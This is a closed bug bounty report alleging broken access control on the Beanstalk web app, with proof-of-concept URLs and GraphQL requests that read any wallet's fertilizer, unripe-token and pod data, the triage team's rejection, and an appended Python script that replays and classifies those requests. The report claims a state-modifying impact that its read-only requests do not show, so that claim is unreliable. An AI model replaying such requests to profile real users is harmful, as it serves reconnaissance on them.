Beanstalk Notion
Report #35516

Report Date
September 25, 2024
Status
Closed
Payout

Insecure Design + Broken Access in https://app.bean.money

Report Info

Report ID

#35516

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

  • Taking state-modifying authenticated actions (with or without blockchain state interaction) on behalf of other users without any interaction by that user, such as voting in governance

Description

The web API of https://app.bean.money is vulnerable to broken access control. By accessing certain URIs, an attacker can view the unripe tokens of any account, as long as they have the wallet address. Additionally, an attacker can view the fertilizer balances and Pod information of any wallet without proper session authorization checks.

Impact

  • An attacker can view the fertilizer balance of any account without authenticating or having permission to access the account. This is most useful for reconnaissance purposes.
  • The vulnerability could also be used to harvest sensitive information, such as wallet addresses and token balances.

Proof of concept

Replay each of the following requests to confirm the exploit. Replace <<ACCOUNT>> with the victim's account.

https://app.bean.money/.netlify/functions/pick?account=<<ACCOUNT>>

https://app.bean.money/.netlify/functions/unripe?account=<<ACCOUNT>>

Replay the GraphQL API requests below as well:

POST /subgraphs/name/beanstalk-dev HTTP/1.1
Host: graph.node.bean.money
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Referer: https://app.bean.money/
Content-Type: application/json
Origin: https://app.bean.money
Content-Length: 367

{"operationName":"FertilizerBalances","variables":{"account":"<<ACCOUNT>>"},"query":"query FertilizerBalances($account: String) {\n  fertilizerBalances(where: {farmer: $account}) {\n    amount\n    fertilizerToken {\n      id\n      endBpf\n      season\n      humidity\n      startBpf\n      __typename\n    }\n    __typename\n  }\n}"}

POST /subgraphs/name/beanstalk-dev HTTP/1.1
Host: graph.node.bean.money
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Referer: https://app.bean.money/
Content-Type: application/json
Origin: https://app.bean.money

{"operationName":"FarmerSiloAssetSnapshots","variables":{"account":"<<ACCOUNT>>"},"query":"query FarmerSiloAssetSnapshots($account: ID!) {\n  farmer(id: $account) {\n    silo {\n      assets {\n        token\n        hourlySnapshots(orderBy: season, orderDirection: asc) {\n          id\n          season\n          deltaDepositedBDV\n          deltaDepositedAmount\n          depositedBDV\n          createdAt\n          __typename\n        }\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}"}

POST /subgraphs/name/beanstalk-dev HTTP/1.1
Host: graph.node.bean.money
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Referer: https://app.bean.money/
Content-Type: application/json
Origin: https://app.bean.money

{"operationName":"FarmerPodListings","variables":{"first":1000,"account":"<<ACCOUNT>>","createdAt_gt":0},"query":"query FarmerPodListings($first: Int = 1000, $createdAt_gt: BigInt, $account: String!) {\n  podListings(\n    first: $first\n    where: {createdAt_gt: $createdAt_gt, farmer: $account, status_not: FILLED_PARTIAL}\n  ) {\n    ...PodListing\n    __typename\n  }\n}\n\nfragment PodListing on PodListing {\n  id\n  farmer {\n    id\n    __typename\n  }\n  historyID\n  index\n  start\n  mode\n  pricingType\n  pricePerPod\n  pricingFunction\n  maxHarvestableIndex\n  minFillAmount\n  originalIndex\n  originalAmount\n  filled\n  amount\n  remainingAmount\n  filledAmount\n  status\n  createdAt\n  updatedAt\n  creationHash\n  __typename\n}"}

Immunefi Response

We have reviewed your report and regret to inform you that we will have to close it due to an inadequate proof of concept (PoC).

Immunefi review:

  • Assessed impact by the triage team is not in scope for the bug bounty program.
  • Assessed asset by the triage team is in scope for the bug bounty program.
  • The submitted PoC is inadequate for the described issue.
  • Technical review:
    • The PoC doesn't demonstrate a state-modifying action, nor does it highlight a bug unless proven.

To ensure the proper escalation and evaluation of your report, Immunefi has checked the PoC to see if it matches the assessed impact and bug description, as well as verified the accuracy of your claims.

Please note that the project's team will receive a report of the closed submission and may choose to re-open it at their discretion. However, they are under no obligation to do so.
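The following Python script is an added example, not code from Beanstalk, Immunefi or the reporter. It replays the read-only requests from the proof of concept above and adds the comparison a triager needs before calling something broken access control: the same resource fetched with no session, with the victim's session, and with an unrelated attacker's session. An anonymous fetch alone cannot distinguish a missing authorization check from data that is public to begin with, which is what on-chain state served by a public subgraph is; only the three-way comparison can. The endpoints and the FertilizerBalances query are the ones quoted in the report; the `cookie` parameter (a session, if the app had one) and the shape of the request plan are assumptions made for illustration. Nothing here can show a state-modifying action, because every request in the PoC is a read.

```python
import json
import re
import sys
import urllib.error
import urllib.request
from typing import Optional

# Endpoints exactly as quoted in the report.
NETLIFY_FUNCTIONS = {
    "pick": "https://app.bean.money/.netlify/functions/pick?account={account}",
    "unripe": "https://app.bean.money/.netlify/functions/unripe?account={account}",
}
SUBGRAPH_URL = "https://graph.node.bean.money/subgraphs/name/beanstalk-dev"

# The FertilizerBalances query from the captured request, without the __typename fields.
FERTILIZER_BALANCES_QUERY = (
    "query FertilizerBalances($account: String) {\n"
    "  fertilizerBalances(where: {farmer: $account}) {\n"
    "    amount\n"
    "    fertilizerToken { id endBpf season humidity startBpf }\n"
    "  }\n"
    "}"
)

_ADDRESS_RE = re.compile(r"^0x[0-9a-fA-F]{40}$")
_REFUSED = {401, 403}


def is_evm_address(value: str) -> bool:
    """Accept only a 20-byte hex address so nothing else gets interpolated into a URL or query."""
    return bool(_ADDRESS_RE.match(value))


def plan_requests(account: str) -> list[dict]:
    """Return the PoC's read requests with <<ACCOUNT>> filled in (assumed shape: name/method/url/body)."""
    if not is_evm_address(account):
        raise ValueError("account must be a 0x-prefixed 40-hex-digit address")
    gql_body = json.dumps(
        {"operationName": "FertilizerBalances",
         "variables": {"account": account},
         "query": FERTILIZER_BALANCES_QUERY},
        separators=(",", ":"),
    )
    return [
        {"name": "pick", "method": "GET",
         "url": NETLIFY_FUNCTIONS["pick"].format(account=account), "body": None},
        {"name": "unripe", "method": "GET",
         "url": NETLIFY_FUNCTIONS["unripe"].format(account=account), "body": None},
        {"name": "FertilizerBalances", "method": "POST", "url": SUBGRAPH_URL, "body": gql_body},
    ]


def fetch(spec: dict, cookie: Optional[str] = None) -> tuple[int, str]:
    """Send one planned request (network call, used only by main()) and return (status, body)."""
    data = spec["body"].encode() if spec["body"] else None
    req = urllib.request.Request(
        spec["url"], data=data, method=spec["method"],
        headers={"Accept": "*/*", "Content-Type": "application/json",
                 "Origin": "https://app.bean.money"},
    )
    if cookie:  # assumption: a session, if the app had one, would travel as a cookie
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def _normalized(body: str):
    """Compare JSON structurally so whitespace differences do not look like different data."""
    try:
        return json.loads(body)
    except ValueError:
        return body


def classify(anonymous: tuple[int, str], victim: tuple[int, str], attacker: tuple[int, str]) -> str:
    """Classify (status, body) observations of one resource fetched three ways.

    gated        - anonymous and attacker are refused (401/403), victim is served: access control works
    idor         - anonymous is refused but a logged-in attacker receives the victim's data
    ungated-read - every caller gets the same 2xx body: the resource is simply public, the expected
                   result for on-chain state served by a public subgraph
    inconclusive - anything else, including the victim being refused or bodies that differ
    """
    a_status, a_body = anonymous
    v_status, v_body = victim
    t_status, t_body = attacker

    def ok(status: int) -> bool:
        return 200 <= status < 300

    if not ok(v_status):
        return "inconclusive"
    if a_status in _REFUSED and t_status in _REFUSED:
        return "gated"
    if a_status in _REFUSED and ok(t_status) and _normalized(t_body) == _normalized(v_body):
        return "idor"
    if ok(a_status) and ok(t_status) and _normalized(a_body) == _normalized(v_body) == _normalized(t_body):
        return "ungated-read"
    return "inconclusive"


if __name__ == "__main__":
    # Anonymous replay of the PoC, as the report asks for: python3 replay.py 0x<victim address>
    for spec in plan_requests(sys.argv[1]):
        status, body = fetch(spec)
        print(f"{spec['name']:<18} {status}  {body[:120]!r}")
    # With victim and attacker sessions captured as well, pass all three observations to classify();
    # an 'ungated-read' verdict on data that is already public on-chain is not an access-control bug.
```

The verdict that matters for a report like this one is the difference between `idor` and `ungated-read`: both look identical from the anonymous replay the PoC describes, and only the former is a bug.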